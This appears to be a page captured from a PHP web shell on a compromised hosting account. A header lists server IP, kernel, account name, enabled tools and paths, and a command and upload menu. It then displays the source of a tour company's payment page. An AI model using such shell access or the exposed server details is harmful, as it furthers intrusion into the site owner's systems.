Server IP : 103.53.40.154 / Your IP : 13.58.38.184 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/indiatourbus.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html lang="en"> <head> <title>Delhi To Agra Tour By Car</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php include "links.php"; ?> <style> #payment .pay-flex{ display: flex; justify-content: start; align-items: center; text-align: center; } #payment .pay-flex img{ width: 33px; margin-right: 15px; } #payment .pay-flex p{ padding-top: 15px; } #payment .pay-flex h6{ margin-right: 15px; } #payment .pay-flex input{ margin-bottom: 10px; } #payment .pay-btn{ border: none; outline: none; color: #ffffff; background-color: #ff4838; padding: 10px 25px; border-radius: 8px; float: left; font-weight: 700; } #payment .row{ border: 1px solid #ff4838; box-sizing: border-box; padding: 10px; } /* .payment-inner h6{ border-bottom: 1px solid #ff4838; } */ #payment .sec-head{ border-bottom: 1px solid #ff4838; width: 100%; padding-bottom: 12px; } #payment .payment-inner{ border-right: 1px solid #ff4838; width: 100%; } #payment .payment-inner:last-child{ border-right: none; } </style> </head> <body> <?php include "header.php"; ?> <!-- breadcrumb code --> <div class="breadcrumb breadcrumb-style-one"> <div class="container"> <div class="col-lg-12 text-center"> <h1 class="breadcrumb-title">Pay Now</h1> <ul class="d-flex justify-content-center breadcrumb-items"> <li class="breadcrumb-item"><a href="index.html">Home</a></li> <li class="breadcrumb-item active">Pay Now</li> </ul> </div> </div> </div> <section id="payment"> <div class="container"> <h2 class="mheading text-center py-4">Please Select Your Mode of Payment</h2> <div class="row"> <h6 class="text-center sec-head">Wallet/QR Code/UPI (Google Pay/Phone Pay/Paytm/Bhim UPI) etc.</h6> <div class="col-lg-6" style="border-right:2px;"> <div class="payment-inner text-center"> <h6>India Tourism Incredible</h6> <img src="bus-img/payment/2019-12-18.jpg" class="w-80" alt=""> <p></p> <div class="s-img"> <img src="bus-img/payment/g-pay.png" alt=""> <img src="bus-img/payment/phone-pay.png" alt=""> <img src="bus-img/payment/pytm1.png" alt=""> </div> </div> </div> <div class="col-lg-6"> <div class="payment-inner text-center"> <div class="img-w-txt"> <span class="pay-flex"> <img src="bus-img/payment/g-pay.png" alt=""> <p>9999414160</p> </span > <span class="pay-flex"> <img src="bus-img/payment/phone-pay.png" alt=""> <p>9999414160</p> </span> <span class="pay-flex"> <img src="bus-img/payment/pytm1.png" alt=""> <p>9999414160</p> </span> </div> <div class="pyt-btm"> <span class="pay-flex"> <h6>Transaction Ref. No :</h6> <input type="text" placeholder="Enter Your Transaction No"> </span> <span class="pay-flex"> <h6>Attach Screenshot :</h6> <input type="file"> </span> <button class="pay-btn">Submit</button> </div> </div> </div> </div> </div> </section> <?php include "footer.php"; ?> </body> </html>